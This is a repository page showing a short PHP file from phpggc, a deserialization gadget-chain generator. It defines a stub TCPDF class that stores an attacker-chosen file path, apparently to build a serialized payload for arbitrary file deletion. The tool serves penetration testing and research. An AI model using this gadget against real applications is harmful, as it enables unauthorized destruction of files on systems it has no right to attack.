Codebase list phpggc / 9a88393 gadgetchains / TCPDF / FD / 1 / gadgets.php
9a88393

Tree @9a88393 (Download .tar.gz)

gadgets.php @9a88393raw · history · blame

<?php

class TCPDF {
    protected $imagekeys;
    
    function __construct($remote_file) {
		$this->imagekeys = [
		    $remote_file
        ];
    }
}